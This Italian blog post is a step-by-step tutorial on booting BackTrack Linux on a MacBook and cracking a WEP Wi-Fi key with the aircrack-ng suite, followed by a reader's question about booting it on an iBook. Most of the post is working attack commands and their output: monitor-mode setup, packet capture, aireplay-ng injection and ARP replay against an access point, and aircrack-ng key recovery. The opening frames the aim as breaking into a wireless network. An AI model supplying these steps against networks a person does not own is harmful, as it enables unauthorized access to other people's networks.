logo

Back|Track Packet injection con AirPort

dragon_small.jpg

Molti insistono ad impiegare, o meglio a provare ad utilizzare Kismac con la scheda Airport del Macbook con la speranza di violare una rete wireless, attualmente è impossibile. L’unica cosa che possono fare è abilitare i drivers per il “passive mode” (vedete l’articolo relativo) ma niente di più.

Con questo non voglio dire che con la scheda Airport non si può fare l’injection, è solo che per farlo usano la piattaforma sbagliata.

Difatti per abilitare tale funzione occorre solo il giusto programma:

Backtrack

una distribuzione live di Linux (circa 700 Mb) con vari utili programmi tra i quali Aircrack.

La procedura è molto semplice:

Andate sul sito http://www.remote-exploit.org/backtrack.html e scaricate l’immagine iso .

Una volta scaricata l’immagine masterizzatela su un CD (consiglio di farlo con Utility Disco/Masterizza senza complicarvi la vita con altri programmi).

Creato il cd lasciatelo inserito nel computer ed riavviate il MAC tenendo premuto il tasto C in modo tale da avviare da CD-rom, partirà l’installazione.

Quando vi verrà chiesto la modalità grafica vi consiglio di scegliere KDE.

Una volta installato aprite il pannello All Applications e sfogliate le seguenti cartelle:

Backtrack

Radio Network Analysis

80211

Cracking

Aircrack

Dalla cartella Aircrack avviate tre programmi in tre diverse Shell:

Air Replay

Aiodump

Aircrack

La procedura per cracking è stata già esaurientemente descritta nell’articolo relativo ad Aircrack-ng ma per completezza sintetizzo come procedere.

Il test è stato eseguito sulla mia rete Wireless per l’occasione protetta con chiave WEP.

Dalla Shell Airodump digitate:

iwconfig

e scoprite la sigla attribuita alla vostra scheda wifi:

lo no wileress extensions

eth0 no wileress extensions

wifi0 no wireless exensions

ath0 IEEE 802.11g ESSID:”” Nikname:””

Mode: Managed Channel:0 Access Point Not-Associated

Bit Rate:0 kb/s Tx-Power:14 dBm Sensitivity:1/1

Retry:off RTS thr:off Fragment thr:off

Encription key :off Power Management:off

digitate

airmon-ng start wifi0:

interface Chipset Driver

wifi0 Atheros madwifi-ng

ath0 Atheros madwifi-ng VAP (parent: wifi0)

ath1 Atheros madwifi-ng VAP (parent: wifi0) (monitor mode enabled)

che abilita ath1 (la mia scheda) in monitor mode

poi:

airodump-ng ath1

segnatevi il canale CH e fermate l’applicazione:

ctrl C

digitate:

airodump-ng -c 1 -w pippo ath1

Airodump inizierà a lavorare e salverà di dati catturati nel file pippo-01.cap

Adesso per stimolare la produzione di IVs procedete con l’injection:

per testare se la scheda funziona:

aireplay-ng -9 ath1

se è tutto ok apparirà:

Trying broadcast probe requests….

Found 1 AP

poi procederò a pingare gli Access Point disponibili:

Trying directed probe requests

00:19:xx:xx:xx:xx – channel 1 – ‘Alice-xxxxxx’

Ping (min/avg/max): 3.969ms/104.333ms/171.666 ms Power 78.79

30/30: 100%

Injection is working!

aireplay-ng -3 -b (indirizzo MAC del A.P.) -d ff:ff:ff:ff:ff:ff -h (indirzzo MAC del T.C.) ath1

ed ecco partire l’injection dalla nostra Airport.

Dalla Shell di Airodump tenete sotto controllo i paccketti IVs catturati e, quanto arrivate ad un numero discreto (a me ne sono bastati 34000), procedete con il cracking.

Dalla Shell di Aircrack digitate

aircrack-ng -a 1 pippo-01.cap

se i pacchetti catturati sono sufficienti, in pocki secondi otterrete la chiave.

Come già detto per i dettagli e le varie modalità di attacco leggete l’articolo relativo a Aircrack ng.

Buon lavoro


One comment

  1. grisu73 ha detto:

    ciao, scusa ho scaricato backtrack ma una volta che masterizzo la iso e riavvio il mio ibook non parte il live, mi sapresti dire quale iso devo scaricare per il mio mac? ringrazio anticipatamente….

Lascia un commento